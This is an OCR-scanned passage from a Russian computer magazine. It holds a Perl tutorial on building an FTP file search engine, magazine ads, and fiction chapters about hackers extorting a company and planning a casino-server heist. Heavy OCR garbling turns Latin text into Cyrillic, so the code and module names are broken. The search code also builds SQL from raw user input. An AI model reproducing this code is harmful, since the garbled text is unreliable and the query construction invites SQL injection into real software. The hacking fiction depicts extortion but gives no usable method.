зеагсб.сді проводит анализ запроса. Если 
запрос простой (одно слово), происходит 
выборка из БД. В противном случае строка 
разбивается по пробелам. В сценарии ука- 
зывается число ссылок, которые будут отоб- 
ражаться на каждой странице, а также кос- 
метические переменные, содержащие цвет 
фона и найденной ссылки. 

Л РОЖДЕНИЕ ИНДЕКСОТОРО 

По логике первым разумнее написать индек- 
сатор, так как тестировать ѵѵеЬ-интерфейс 
без заполненной базы данных весьма гимор- 
но. Индексатор представляет собой сцена- 
рий, использующий четыре модуля. Вот их 
краткое описание: 

Се(ор(::81сІ - модуль, позволяющий 
парсить параметры командной строки. Неко- 
торые начинающие кодеры не знают о его 
наличии и лишний раз изобретают велоси- 
пед в своем коде ;). 

ЭВІ - модуль, который связывает индек- 
сатор с туЗОІ-. В случае если ты ставишь 



поисковик под винду, придется повозиться с 
процессом установки ОВІ.рпл. Особенности 
виндовой настройки смотри на врезке. 

Меі::РІр::Весиг8іѵе - модуль для 
рекурсивной обработки файлов на уда- 
ленном РТР-сервере. В функции этого 
модуля входит рекурсивный просмотр, 
скачивание и заливка файлов. Нам нужна 
процедура гсііг, которая выдает информа- 
цию обо всех файлах в директории и пос- 
ледующих каталогах. 

РіІеНапсІІе - скрипт, с помощью которо- 
го можно создать файловый дескриптор, в 
который будет занесена информация произ- 
вольного вида. Например, инфа о файле. 

С модулями разобрались. Теперь погово- 
рим о процедурах, содержащихся в индек- 
саторе. Это главная процедура соппесШр(), 
позволяющая соединиться с РТР-сервером 
и получить рекурсивный список файлов. За- 
тем іпзеП бЬ. В ней происходит вставка ин- 
формации в БД. Процедура деіІізі() получа- 
ет информацию об РТР-серверах, которые 
необходимо проиндексировать. И в конце 
скрипта можно увидеть две неприметные 
процедуры деІгеД) и риІгеІ(). Они нужны 
для реализации потоков и будут рассмотре- 
ны подробнее чуть ниже. 
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УЖЕ В ПРОДАЖЕ 




Пожалуй, самой главной переменной в 
индексаторе является $ЙтгеасІ5, которая ука- 
зывает количество тредов. С ее значением 
можно поиграться, но главное - не перебор- 
щить. Я выставил 5 независимых потоков, 
думаю, этого будет вполне достаточно. 

В самом начале идет вызов процедуры 
деіІізі(), т.е. запрос информации об РТР-сер- 
верах. Тут все очень просто - обычный кон- 
нект, зеіесі-запрос и возврат переменной. 
Далее уменьшаем количество потоков на 
единицу. Почему? Все просто - РегІ ведет 
отсчет значений числовых переменных с О, 
поэтому если мы имеем 5 потоков, то на са- 
мом деле их будет 6, что не совсем коррект- 
но. Затем инициализируем переменную $ге(, 
которая изначально будет равна удвоенному 
произведению тредов. Смысл этого вот в 
чем: во время рождения нового подпроцесса 
будем уменьшать $геІ. Как только значение 
переменной становится равным значению 
$ІЕігеаб$ - происходит временная блокиров- 
ка создания потомков. По мере отмирания 
тредов, увеличиваем $геі, что позволяет соз- 
дать еще один потомок. Иными словами, 
вспомогательная переменная нужна для под- 
держания постоянного числа нитей. 

Как говорится, гладко было на бумаге, но 
забыли про овраги. Дело в том, что главная 
программа и ее потомок не могут иметь общих 
переменных. Точнее, главный процесс не име- 
ет доступа к переменным подпроцесса. Возни- 
кает вопрос: как же передать значение $ге1 в 



главную программу? Для этого существует мо- 
дуль ІРС::5ІтагеаЫе, который работает далеко 
не под все платформы. Поэтому я решил 
обойтись старым дедовским способом - пере- 
дать значение через временный файл. Для 
этого и нужны процедуры деІге1() и риІге1(). 

ПРОЦЕДУРА 6ЕТВЕТ0 

$иЬ деігеі { 

## Откроем файл для чтения 
ореп(КЕТ,"теІ"); 

## Заблокируем его от других процессов 
ЯосВДЕТД 

## Получим значение переменной 
$теМЕТ>; 

## Закроем файл 
сІозе(НЕТ); 

## И вернем $те! 
геіитп $геІ; 

} 

Аналогично пишем рц(геІ(), в которой вы- 
полняется обратный процесс :). Правда, 
процедура ничего не возвращает. 

Л КОНТРОЛЬ РОЖДОЕИОСТИ 

Теперь вернемся к контролю числа потом- 
ков. Как только получаем, что $геІ становит- 
ся меньше, чем $Шгеагіз - впадаем в спячку 
(ждем 10 секунд и еще раз запрашиваем 
$геІ). В противном случае ничто не мешает 
родить законный подпроцесс. 
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ПРОБПЕМР С ПОКОПЬЮ 



ь. 



К ак известно, все буржуйские проекты плохо дружат с рус- 
ским языком. АсЕіѵеРегІ в частности. В случае русскоязычных 
запросов подсветка ключевых фраз будет невозможной. Для 
решения проблемы можно использовать модуль Іосаіе. Следу- 
ющие три строки кода полностью решают проблему с языком: 
цке Іосаіе: 

нзе РОЗІХ ч» (ІосаІе_Іт): 
зеіІосаІеЦШѴРЕ, Ти_КЦ.К 0 І 8 -К 




Все, что ты хотел узнать о ѴѴіпсІоѵѵз 
ХР, но боялся спросить! Эксклю- 
зивная информация от самых 
продвинутых специалистов, в том 
числе из МісгозоЙ. Подробные 
материалы про установку, настрой- 
ку, оптимизацию, администрирова- 
ние ХР, о программировании, 
граммотной ликвидации ОС в 
одном номере: 



• Интервью с МісгозоА 

• Последние известия о ЬопдКогп 

• 20 интимных вопросов для 
сисадмина 

• ХР Ѵ5 Ілпих 

• Обрезание ХР 

• Г рамотная установка ѴѴіпХР 

• Настройка ХР (не)встроенными 
средствами системы 

• Модернизируем интерфейс 

• Безопасность ХР 

• Вся правда о системном реестре 

• Проблемы с железом 

• Сервисы 

• Как убить ХР 

• Восстановление ѴѴіпХР 

• Обзор необходимого софта 
•РАО 

• Обзор книг 

• Полезные ресурсы в интернете 



и куча другой 
полезной информации 
и бонусов 
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ИГРЫ ПО КПТШ 10 ГПМ с достпвной ни дом 
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$79,99 
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$75.99 
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Я ХОЧУ ПОЛУЧАТЬ 

БЕСПЛАТНЫЙ КАТАЛОГ РС ИГР 



ИНДЕКС _ 

УЛИЦА 

ФИО 



_ КОРПУС КВАРТИРА _ 




ГПЮЧНПЯ РЕКУРСИЯ 



М одуль ІЧеІ::РТР::Весигзіѵе может рабо- 
тать некорректно. Проблема в следу- 
ющем: если по какой-либо причине РТР- 
сокет не создается, работа модуля прек- 
ращается. Отследить место ошибки у ме- 
ня не получилось, поэтому поручаю это 
тебе :). Правда, радует, что такая бага 
встречается очень редко. 

Кстати о модуле. Чтобы узнать размер 
файла, необходимо чуть пропатчить сор- 
цы скрипта Ресигзіѵе.рт, а именно пре- 
образить строку вывода: 

ргіпі $№ $гетоІе_рѵ»(1, У, $ІІІепаліе,":",$ІІІе->ІіеІб5(М4],"\п" ипІе$: ($ЯІе->І50ігесІогу); 

Метод Тіеісіз возвращает размер файла. 



Рождать будем стандартным Тогк()’ом. 

В теле родителя уменьшаем $геІ и заносим значение в файл. В 
теле потомка вызываем соппесМр() с параметрами РТР-сервера. 
Затем увеличиваем $геІ (смерть потомка близка) и убиваем про- 
цесс командой ехіі :). 



РОЖДЕНИЕ ПОДПРОЦЕССА 



#8 Если лимит подпроцессов исчерпан 
ѵ»ІііІе($геІ<$1(ігеа(І5) { 

88 Ёпадаем в анабиоз ;) 
зІеер(Ю): 

#8 И запрашиваем $ге! 

$ге1=деіге((): 

} 

88 Если отсутствует инсра об РТР-сервере - пропускаем шаг 
пехі нліезз ($ТІр[$і]); 
і( (ЗріИогкО) { 88 Вызываем ІоткО 
$геІ~; 

88 Если отсутствует инсра об РТР-сервере - пропускаем шаг 
риІгеКЗгеЕ): 

}еІзе{ 

іпІезз(соппесИІр($ІІр[$і])) { 

88 Если отсутствует инсра об РТР-сервере - пропускаем шаг 
ргіпі "САЙТ СІШЕСТ ТО $8р[$і]\п": 

) 

риІгеІ($геН: 

ехіі: 88 Пишем в файл увеличенный $геТ и выходим из потомка 
} 

) 
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замути свой ѵпнао & индекс 



В соппесШрО нет ничего хитрого. Обыч- 
ное объектно-ориентированное программи- 
рование, а именно, вызов конструктора, соз- 
дание РІІеНапсІІе и рекурсивный запрос. Ин- 
формацию в РІІеНапсІІе кидаем в файл с ин- 
дексами. Все просто, поэтому останавли- 
ваться на процедуре я не буду. Для полного 
понимания - ВТРМ :). 

А вот на іпзеіі _с!Ь() хотелось бы остано- 
виться подробнее. После того как будет сос- 
тавлен файл с инфой, соединяемся с БД и 
построчно отправляем данные в базу, пред- 
варительно выделив путь, имя файла и его 
размер. Четвертым параметром является ин- 
формация о местонахождении файла (РТР- 
сервер, логин, пароль и порт) - эта инфа 
очень важна для ѵѵеЬ-части системы. 

Из командной строки мы выделяем пара- 
метр -I, значение которого - РТР-сервер. 
Это сделано для того, чтобы проиндексиро- 
вать один ФТПшник, а не целый лист. 



^ШЕВ-ПОИСК-ПИЦО СИСТЕМЫ 

С индексатором разобрались. Осталось лишь 
создать БД с именем зеагсіі, в которой будут 
находиться две таблицы: гезоигсез (РТР-сер- 
веры) и гез (индексы файлов). Когда все бу- 
дет готово, можно запускать. В сорцах я ос- 
тавил много отладочной информации (она 
поможет тебе разобраться, если что-то пой- 
дет не так), можешь ее убрать. 

Пришло время рассказать о возможностях 
ѵгеЬ-среды. Я сделал так, чтобы ты сам мог 
выбрать дизайн поисковика. Для этого соз- 
дал три файла, в которых содержатся Иеасіег, 
іооіег и іаЫе (таблица с найденной ссылкой). 
В этих іііті-файлах встречаются шаблоны ти- 
па АВЗОШГЕ, ВЕЗОШСЕ и т.п., которые при 
подгрузке заменяются значениями переменных. 

Следующая фича ѵѵеб-среды - проверка 
доступности сервера. То есть перед выдачей 
результата происходит создание сокета, пос- 
ле чего становится понятным - жив ли сер- 
вак. Замечу, что если сервер 
встречается повторно, про- 
верки не происходит. 

^НУИЗОПРОСЫ 
У впс... 

Теперь о запросах. Базовым 
кверизом является строка 
«ЗЕБЕСТ * РВОМ гез ѴѴНЕВЕ». 
Далее все зависит от ситуа- 
ции. Если юзер вводит в 
форму всего одно слово - к 
запросу добавляется «пате 
Ііке \"\%$фиегу[$#риегу]\%\», 
где элемент массива означа- 
ет последнее (единственное) 
слово в форме. В случае если 
слов много, прежде чем фор- 
мировать концовку, добавля- 
ются вставки «пате Ііке 
$циегу[$і] $Іодіс». Перемен- 
ная $Іодіс может иметь два 
значения: ог или апб, в зави- 
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Б ольшинство людей будут устанавливать поисковик под І_іпих, 
но счастливые обладатели ѴѴІпФоѵѵз тоже могут настроить 
свой Яндекс. Для этого скачивай и устанавливай нужные модули 
с помощью скрипта ррт.ЬаБ, входящего в поставку РегІ. В инте- 
рактивном режиме вводи команду “іпзБаІІ ОВІ” (для установки 
ОВІ.рт), и модуль успешно установится. Для правильной рабо- 
ты системы позаботься также об установке виндового гпуЗОШ. 
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симости от указанной логики поиска. Послед- 
ним добавлением к запросу будет лимит - 
указанное число ссылок на каждой странице. 



ФОРМИРОВАНИЕ ЗАПРОСА 



АН Базовый запрос 
$йеге="5ЕІ.ЕСТ * ЕКОМ гез ѴѴНЕКЕ 
НА Сплитуем предложение из формы 
®Чііегу=5рІіІ(' '.Зциегу): 

і( (зсаіаг Идиегу > 1) { АА Если имеем более одного слова 
Гог(8і=0;$і<=$Ачиегу-1;$і*+) { 

АА Для каждого слова делаем вставку $Іодіс 
$и1іеге.="пате Ііке \"\%$дпегу[$і]\%\" ЗІодіс 
}} 

АА Завершающая вставка для последнего слова 
$йеге .=" пате Ііке \"\%$длегу[$Адиегу]\%\"": 

Зббіі = 0ВІ->соппесі('ФВІ:ту5дІ:$еагсА:ШІ.0.1"); 

АА Соединяемся с базой и выполняем подсчет ссылок 
($соипІ=$йеге)=-5Л*/сопп1(пате)/д: 

$5й = $бЫг>ргераге("$соііпі"); 

$5ІІг>ехесоІе: 

$ап5=$$1Іг>(еІсІіпм_аггауге(; 

АА Затем формируем число странид 
$раде5=іп(($ап$->[0]/$Ііліі1_ѵіе»)+2; 
$опсе=$ІітіІ_ѵіе»*($раде-1М; 
і( ($1іті1_»іеѵг <= $апз->[0]) { 

АА И завершаем формирование запроса лимитированием 
$йеге .=" Іітіі $опсе,$ІітіІ_ѵіеѵт"; 

} 




л Скачать полную 
версию поисковика 
ты можешь по 
ссылке 

кашепвк.пе(.ги/(ог 
Ь/1/х/веагсІі_8у8- 
Іеш.іаг.дг. Там ты 
найдешь фейс к сис- 
теме, а также два 
главных скрипта. 

л В скрипте индек- 
сатора содержится 
отладочная инфор- 
мация. Убирать ее 
не рекомендую, так 
как вполне возмож- 
на ошибка при рабо- 
те, которую ты легко 
можешь исправить 
с помощью дебага. 



Рассмотрим пример: юзер ищет песни 
группы «Ария». Он вводит запрос «Ария 
трЗ». Если мы имеем 120 ссылок, удовлет- 
воряющих запросу, то скрипт формирует 
следующее обращение к туЗСІЕ: «ЗЕБЕСТ * 
РВОМ гез ѵѵБіеге паше Ііке “%Ария%” апгі 
пате Ііке “%трЗ%” Іітіі 0,50”. При обраще- 
нии ко второй странице к каждой цифре ли- 
мита прибавится число 50 и так далее. 

Если в запросе совпадают абсолютно все 
слова, то после ссылки будет надпись - 
«Строгое соответствие», в противном случае 
соответствие является нестрогим. Послед- 
ний штрих - перевод размера в удобочитае- 
мый формат, подкраска ключевых фраз и 
вывод ответа на экран. 

Вот и весь Яндекс :). Для того чтобы все 
работало - состряпай МплІ-формочку, в ко- 
торой будет форма для ввода и логика поис- 
ка. Эти параметры отправляй на растерзание 
скрипту зеагсіі. сді. Да, и не забудь каждый 
день проводить индекс РТР-серверов и под- 
держивать базу в чистом состоянии. Только 
тогда юзеры сети будут тебя боготворить и 
проставляться пивом :) в надежде на новые 
интересные проекты. 





НТМЬ-форма для твоего Яндекса 
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часть 2 




Г анс Хайснер припарковал машину на стоянке возле 
компании. Роскошный ягуар шефа уже стоял на сво- 
ем обычном месте. Ганс собирался сегодня погово- 
рить о покупке нового оборудования, и специально 
приехал немного раньше, чтобы застать своего на- 
чальника в личном кабинете, пока тот не уехал на 
ежедневные переговоры. 

Предъявив пропуск на входе, Хайснер поднялся на 
свой этаж. В офисе за компьютерами уже работали 
двое других сотрудников «Рагатаз». Или делали вид, 
что работали. По мнению Ганса, можно было безбо- 
лезненно уволить половину этих лентяев, все равно 
от них никакого проку. 

- Здравствуйте, Ганс, - поздоровалась темнокожая 
секретарша и отхлебнула дымящийся кофе. 

Ганс жестом поприветствовал сотрудницу и просле- 
довал в свой кабинет. 

Хайснер был одним из тех работников «Рагатаз», 
без которого не мог пройти ни один рабочий день. 
Вместе со своим помощником Томом он отвечал за 
работоспособность всех систем коммуникации, свя- 
зывающих компанию с внешним миром. Помимо 
этого, в их задачу входило обеспечивать компьютер- 
ную поддержку и консультировать неграмотных кол- 
лег по техническим вопросам. 

Кабинет Ганса представлял собой типичный сисад- 
минский штаб. Офисный стол, сервер, три монитора, 
ноутбук, несколько телефонов, спутниковое обору- 
дование, нацеленное на окно. Все аккуратно рас- 
ставлено по своим местам и не мешает работе. 



Г анс снял одну из трубок, нажал кнопку быстрой свя- 
зи и сразу услышал хриплый голос шефа. 

- Мистер Бьюссер, Вы свободны? Нам надо перего- 
ворить. 

- Дайте мне 10 минут, Хайснер. Я только приехал. 
Пожалуй, я знаю, о чем Вы хотите со мной погово- 
рить. Зайдите чуть позже, обсудим детали. 

- Отлично! - Ганс повесил трубку. 

Значит, шеф согласился выделить деньги. Теперь у 
него будет одна из самых быстрых и надежных 
компьютерных систем в городе. Мысль об этом дос- 
тавляла Хайснеру чувство глубокого удовлетворе- 
ния. 

Он включил монитор и, быстро прочитав почту, при- 
нялся за логи. Что-то в них его насторожило. В прог- 
раммных строчках явно просматривалось чье-то 
вторжение. Наверное, тот самый горе-хакер, кото- 
рый вымогал у компании $25 тыс. в обмен на безо- 
пасность корпоративного архива. Этот идиот свя- 
зался с Гансом неделю назад и пригрозил удалить 
все документы на сервере, если они не пойдут ему 
навстречу. Хайснер убедил босса, что система на- 
дежна, дыр в ней нет, и смешно выплачивать деньги 
непонятно кому. Пусть даже информация, которая 
находится на сервере, стоит больше миллиона дол- 
ларов. Ганс в доступной форме объяснил хакеру, ку- 
да ему следует пойти со своими запросами. Но, ока- 
залось, незнакомец не блефовал. 

Логи свидетельствовали о безуспешных попытках 
прорваться через закрытые файрволом порты. И 
чем дольше Ганс вглядывался в строки, тем боль- 
шую тревогу испытывал. Наконец, оторвавшись от 
изучения логов, он на всякий случай проверил цело- 
стность базы данных. И остолбенел. Корпоративный 
архив был пуст. Ни одного файла, ни единого доку- 
мента - все было удалено, судя по всему, без воз- 
можности восстановления. 

В дверь постучали - вошла та самая секретарша. 

- Ганс, я не могу найти на сервере документ, над ко- 
торым вчера работала. Проверьте, пожалуйста! 
Хайснер с трудом сдержался, чтобы не наорать на 
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нее. 

- Хорошо, Г рейс. - чересчур спокойным голосом от- 
ветил он. - Идите к себе, я посмотрю. 

Когда негритянка вышла, побледневший Ганс при- 
нялся ожесточенно теребить клаву. Он все еще на- 
деялся, что это второе предостережение, и хакер 
просто перенес информацию на другой раздел вин- 
та. Тогда нужно будет сразу сохранить резервные 
копии, что давно уже следовало сделать, и на что 
Хайснер от лени попросту забил. Ганс пробежался по 
всем уголкам внутренней сети - базы данных нигде 
не было. Логи тоже явно редактировались. Хакер был 
не против продемонстрировать админу, каким обра- 
зом он проник в систему. Но все, что могло показать 
его местоположение, было изменено или удалено. 
Ганс откинулся в кресле и закрыл глаза. Он не знал, 
как объяснить все шефу. В лучшем случае его ждет 
увольнение, в худшем - придется возмещать расхо- 
ды из своего кошелька, и на оплату издержек уйдет 
не один год. 

Компьютер тихо пискнул, давая понять, что в «важ- 
ный» ящик пришло письмо. Хайснер открыл ІпЬох и 
увидел мессагу с анонимным полем Ргот: 

«Я Вас предупреждал, Вы меня не послушали. Теперь 
вся база у меня, и цена на нее возросла в десять раз. 
Перешлите $250 тыс. на закрытый счет, указанный 
в приложенном документе, и я сообщу, где можно 
забрать винт с записанной информацией. Даю вам 3 
дня, после чего уничтожаю все данные». 

В этот момент раздался телефонный звонок. Звонил 
шеф. 




В салоне было тихо. Оба мужика упорно отмалчива- 
лись, и Марина даже не пыталась их разговорить. 

- Включите, пожалуйста, музыку, - попросила она, 
обращаясь к водителю. 

Водила щелкнул по панели жутко навороченной маг- 
нитолы, и салон заполнил идеального звучания саун- 
дтрек из «Бригады». Когда-то ей нравился этот се- 
риал. На фоне остального криминального отстоя он 
был весьма неплох. Но теперь музыка приелась и не 
вызывала особой радости. К тому же Марина нерв- 
ничала. Она все еще не знала, куда ее везут. 

Мерс тем временем вырулил из центра и теперь ехал 
по каким-то мрачным районам, где она ни разу не 
была. Дома на глазах редели, людей попадалось все 




меньше. Марина достала мобильник и скинула на 
мыло своего приятеля приметы автомобиля и пер- 
вые цифры номера, которые умудрилась запомнить. 

- Я только что отослала номер машины своему чело- 
веку. На всякий случай. Надеюсь, никаких таких слу- 
чаев не произойдет, - предупредила Марина. 

- Умная девочка, - ухмыльнулся тот, что сидел рядом 
с водителем. - Правда, сменить номера в наше вре- 
мя особой проблемы не составляет. Как и покрасить 
тачку. Но это и не потребуется. Вреда никакого мы 
тебе причинять не собираемся, иначе зачем было 
отправлять деньги? 

- Я тоже так подумала. 

- Кстати, меня зовут Андрей. Это, - он показал на 
водителя, - Антон. У нас, как и у вас, есть свои проз- 
вища. Правда, с компьютерами мы не особо дружим. 

- Вот как? Ты, наверное, Утюг, а это Кислый? 
Мужчины рассмеялись. 

- Нет, все намного проще. Меня называют Палыч, а 
его - Токса. Если хочешь, можешь нас так и звать. 
Марине показалось, что как-то слишком быстро они 
перешли на «ты». 

- Далеко еще ехать? 

- Почти приехали. 

Мрачные переулки сменились огнями - машина 
скользила мимо элитных дач. Вокруг то и дело прос- 
какивали фонтанчики и причудливые скульптуры. 
Наконец, мерс остановился у одного из особняков, 
окруженного высоким забором. Ворота тут же отк- 
рылись, и авто въехало внутрь. 

- Конечная, - резюмировал Токса и, отстегнув ре- 
мень безопасности, вылез из тачки. 

Марина последовала его примеру. 

Дом хорошо освещался, и неподалеку девушка уви- 
дела маленький бассейн. 

- Пошли, нам туда, - Палыч показал на главный вход. 
Антон остался в кабинке у ворот, активно обсуждая 
что-то с охранником. 

Дом, к которому ее вел Андрей, был практически 
идеальной кубической формы. Вымощенный белым 
кирпичом и украшенный изображениями каких-то 
сказочных чудовищ, он походил на ящик Пандоры. В 
некоторых окнах горел свет, на крыше находилась 
огромная спутниковая тарелка. А еще вокруг росло 
много цветов. 

Палыч набрал код на тяжелой железной двери, и она 
тихо открылась. Марина зашла внутрь. 

Прихожая оказалась просторной и была отделана 
красным деревом. Именно так она и представляла 
отделку загородных дач новых русских. Но человек, 
который спустился к ней по лестнице, совсем не по- 
ходил на нувориша. Это был маленький старикашка 
в дорогих очках, с аккуратной седой бородкой и оба- 
ятельной улыбкой. Он подошел к Марине и протянул 
руку: 

- Здравствуй, Ксайла. Ведь именно так тебя называ- 
ют твои виртуальные друзья? 

- Подозреваю, Вам про меня известно не только 
это? 

- Да. Меня зовут дядя Леша. Я давно за тобой наб- 
людаю. И хочу выразить тебе свое искреннее восхи- 
щение. Стащить у Министерства Обороны один из 
самых главных их секретов - это что-то! 

У Марины внутри все похолодело. Она хорошо пом- 
нила этот заказ. Примерно полгода назад незнако- 
мец связался с ней по рабочему мылу, сообщил, что 
ее порекомендовал один из старых заказчиков и из- 
ложил свою просьбу. Нужно было за неделю раздо- 
быть точные координаты местоположения крупней- 
шей секретной базы США «Дельта Икс». За это ей 
обещали 20 тыс. долларов. Марина отказалась. 
Слишком сжатые сроки, слишком сложная задача, к 
тому же она считала неприемлемым отдавать по- 
добные сведения неизвестно кому. Но потом за ме- 
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сяц все-таки раздобыла эту информацию. Для себя. 
Для самопроверки. Она знала, что играет с огнем. 
Такие действия расценивались как шпионаж и мог- 
ли привести к долгим годам отсидки. Но ничего не 
могла с собой поделать. Чем сложнее была задача, 
тем интересней ей было ее осуществить. И плевать 
на деньги. 

Сейчас перед ней стоял старик, который, судя по 
всему, обо всем знал. И мог запросто ее шантажи- 
ровать. Уж не за этим ли он ее сюда позвал? 

- Если не секрет, как тебе это удалось? - дядя Леша 
прищурился и испытывающе посмотрел на девушку. 

- Я не раскрываю методов своей работы. В любом 
случае, никто ничего не сможет доказать. 

- Надеюсь, и не придется. А вообще, что это я, ста- 
рый балбес, держу тебя в коридоре? Пошли, мы жда- 
ли только тебя. Пора поставить вас всех в курс дела. 

- Нас всех? 

- Да. В соседней комнате собралась весьма коло- 
ритная компания. Возможно, ты кого-то узнаешь. 
Старик лукаво улыбнулся, сделал приглашающий 
жест и поднялся по лестнице. На втором этаже был 
большой зал с горящим камином. Зажигать его в 
июньскую жару было, по меньшей мере, странно, но 
едва ступив на порог, она ощутила приятную прохла- 
ду. Где-то определенно стоял кондиционер, и, пожа- 
луй, даже не один. На полу лежал персидский ковер, 
на стенах висели картины. 

В зале сидели шестеро мужчин и одна женщина. 
Трое из них что-то обсуждали, но при появлении ста- 
рика и Марины разговоры прекратились. Марина 
осмотрела присутствующих и замерла. В зале сидел 
Максим. 

- Знакомьтесь, друзья - Марина, более известная в 
сети как Ехсііе. Исследователь сетевой безопаснос- 
ти и эксперт по социальной инженерии. Прошу лю- 
бить и жаловать, - с воодушевлением представил 
свою спутницу дядя Леша. 

Один из мужчин, одетый во все черное, прыснул и 
саркастически заметил: 

- А я-то думаю, кого нам не хватает для полного ви- 
негрета. Точно! Профессиональной вруньи. А сим- 
патичные нынче вруньи пошли! 

- Это Леон, - дядя Леша неодобрительно посмотрел 
на мужчину и покачал головой. - Удивительного 
хамства человек, но один из лучших знатоков своего 
дела. 

Леон приветливо улыбнулся: 

- Если тебе нужно вскрыть замок, снять сигнализа- 
цию или что-то в этом духе - обращайся, детка. Мо- 
жет, помогу. 



- Спасибо. Я не вскрываю чужие замки. 

- Ах да. Ты вскрываешь чужие чувства. 

Мужчина засмеялся. 

- Это Виктор, - старик кивнул в сторону человека в 
костюме. - Или меморайзер. Талантливый криптог- 
раф. И не менее талантливый математик. 

- Мемо. Так проще, - добавил Виктор. 

Очевидно, люди дяди Леши привезли его сюда прямо 
с работы. На нем был деловой костюм, а рядом стоял 
небольшой кейс. 

- Лейзи, - старик указал на неряшливого толстяка в 
толстенных очках, клетчатой рубашке и потертых 
джинсах. - Фрикер. Гроза мобильных операторов. 
Телефонный Бог. 

Толстяк хмыкнул и равнодушно посмотрел на Мари- 
ну. 

- А это Шейдер. Электронщик. Может из груды дета- 
лей собрать что угодно, от микрожучка до космичес- 
кого корабля. Верно, Шейд? 

Мужчина с копной длинных каштановых волос, оде- 
тый в белую футболку, засмеялся: 

- Ну, с кораблем Вы, конечно, загнули. Но жучка соб- 
рать можно. Жучок - дело нехитрое. 

- Макендра, - представил дядя Леша молодую жен- 
щину. - Первоклассный эксперт по игорному делу и 
игровым автоматам. Разработала и внедрила нес- 
колько своих моделей. 

- Если точнее: «Золотая Семерка», «ПинИллюжен» и 
«Драйв», - добавила девушка. - И не надо меня на- 
зывать Макендрой. Это ник для Сети. В реале я - 
Оля. Рада тебя видеть, Марина. Я думала, что мне 
придется и дальше находиться одной в обществе 
этих маньяков. 

- Это мы-то маньяки? - оживился Леон. - Может 
быть, это ты маньячка?! Я-то вижу, как ты на меня 
поглядываешь. 

- Ага, глаз с тебя, красавца, не свожу. Самодоволь- 
ный осел, - Макендра демонстративно отвернулась. 

- Айрекс, - продолжил старик вечер знакомств, по- 
ворачиваясь к совсем молодому пареньку. - Специа- 
лист по банковским операциям и системам платежей. 
Айрекс оказался стройным высоким подростком с 
внимательными умными глазами. Одет он был в си- 
нюю футболку и широкие штаны, в одном ухе торчал 
наушник. Парень кивнул в знак приветствия и отх- 
лебнул кофе из стоящей рядом чашки. 

- С Негро, я думаю, ты уже знакома. 

Марина и Макс обменялись взглядами. 

- Привет, - первым отозвался Макс. 

- Привет, Максим, - ответила Марина. 

Они не знали, что еще сказать. 

Неловкую паузу прервал Леон: 

- Ну что, дядя Леша, вроде все, кто Вам нужен, в сбо- 
ре. Пора заканчивать представления. Расскажите, 
для чего мы все здесь. Я думаю, это интересно каж- 
дому из присутствующих. А лично меня еще интере- 
сует, кто Вы, черт побери, такой? 

Старик сел в кресло у камина, подбросил в костер 
дров и посмотрел на людей, сидящих перед ним. 

- Не думаю, что моя биография вам интересна. Дос- 
таточно сказать, что я - бизнесмен. В наше время 
информация становится все более дорогим товаром. 
Думаю, вам это объяснять не нужно. Информация и 
есть мой бизнес. Остальное - скучные детали. Важ- 
но не кто я такой, а что я хочу вам предложить. 

- И что же Вы хотите нам предложить? - поинтере- 
совался Леон. 

- Я хочу предложить вам работу. Есть одно дело, ко- 
торое я собираюсь провернуть. И мне нужна ваша 
помощь. Помощь каждого из вас, потому что только 
вместе мы сможем это сделать. 

- Дело на миллион долларов? 

- Нет, Леон. Не на миллион. На миллиард. На милли- 
ард зеленых американских долларов. 
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Слово «миллиард» подействовало на собравшихся. 
Леон присвистнул, толстяк Лейзи крякнул, Шейдер 
нервно хмыкнул. 

- Что это Вы задумали? - подал голос толстяк. 

- Не иначе как ограбить Швейцарский банк, - зас- 
меялась Макендра. 

- Ограбление банка - слишком пошло и банально, - 
фыркнул старик. - Нужно идти в ногу со временем. 
Дядя Леша подошел к пульту, вмонтированному в 
стол, и нажал на кнопку. Послышался щелчок, и одна 
из стен стала медленно вращаться. Картины исчез- 
ли, на стене появился огромный плазменный дисп- 
лей. 

- Вау, - Леон снова присвистнул. - Как в фильмах. 
Тут все стены такие? 

Пропустив вопрос мимо ушей, дядя Леша подошел к 
экрану, достал из кармана миниатюрный пульт и на- 
жал на кнопку. Экран загорелся. На нем появилась 
карта. 

- Это карта Лас-Вегаса, - указкой показал старик. - 
На ней вы видите множество красных точек. Это 
крупные казино. Как вы, вероятно, знаете, несколько 
лет назад отдельные заведения стали объединять 
свои игровые автоматы в одну большую сеть, управ- 
ляют которой серверы. Именно на этом мощном 
компьютере генерируются результаты всех нажатий. 
И именно сервер контролирует выпадение призовых 
очков, не допуская того, чтобы автоматы работали в 
убыток. Недавно несколько таких сетей были объе- 
динены в одну. Произошло это из-за того, что Луи 
Ингрефу - владельцу нескольких крупнейших казино 
Лас-Вегаса, удалось приобрести контрольный пакет 
акций четырех своих основных конкурентов. Никто не 
знает, как ему это удалось, но факт остается фактом. 
Сейчас Ингреф - самая влиятельная фигура игорно- 
го бизнеса в Лас-Вегасе. И объединение сетей авто- 
матов в единую сеть - лишь одно из изменений. Все 
это очень подробно освещалось на первых полосах 
американских газет, и многие подозревают «короля 
игорного бизнеса» в нечестной игре. Иначе, какой 
смысл был соперникам отдавать ему контрольный 
пакет? 

Дядя Леша на минуту замолчал. Удостоверившись, 
что все его внимательно слушают, подбросил в ка- 
мин пару деревяшек и продолжил: 









V *ХЧ ч 










53 



ижткии И 1 ВИС ТЕЛЕКОМ ПРЫШАГАЕі 
КОРПОРАТИВНУЮ лр- телефонию 
I ВЛИПАЙ Офисе 



СУПЕРВЫГОДНЫЕ ТАРИФЫ 
ЭКОНОМЬТЕ СВОИ АТНЬГИ 




-ЬЛвНіѵФЛ іким ИА 

' * ирф ятрдо 

<?ик ' щ і р а 

II - " ■ , айгів, 

| 1 1 ■ШІ— И 1 1 |І 






іраш 

т іФв 









- Сам факт роста влияния Ингрефа не так интере- 
сен. Интересно то, что с объединением сетей вырос- 
ла сумма максимального ДжекПота, и на данный 
момент составляет как раз около миллиарда долла- 
ров. Конечно, вероятность его выпадения обычным 
путем ничтожно мала. Но автоматы зависят от 
компьютеров. А компьютеры зависят от людей. 

- Все это чертовски любопытно, - откликнулся Нег- 
ро, - но Вы представляете, насколько серьезно за- 
щищен сервер? 

- Конечно. Именно поэтому я и пригласил вас. Я со- 
бираюсь сорвать этот куш и рассчитываю на вашу 
помощь. На ваши способности. 

- Может, Вы расскажете, как Вы собираетесь все 
это осуществить? - спросил Негро. 

- Расскажу. Но не сегодня. Перенесем обсуждение 
технических деталей на завтра. А сейчас будьте мо- 
ими гостями. Если, конечно, вас заинтересовало мое 
предложение, и вы хотите дослушать его до конца. 
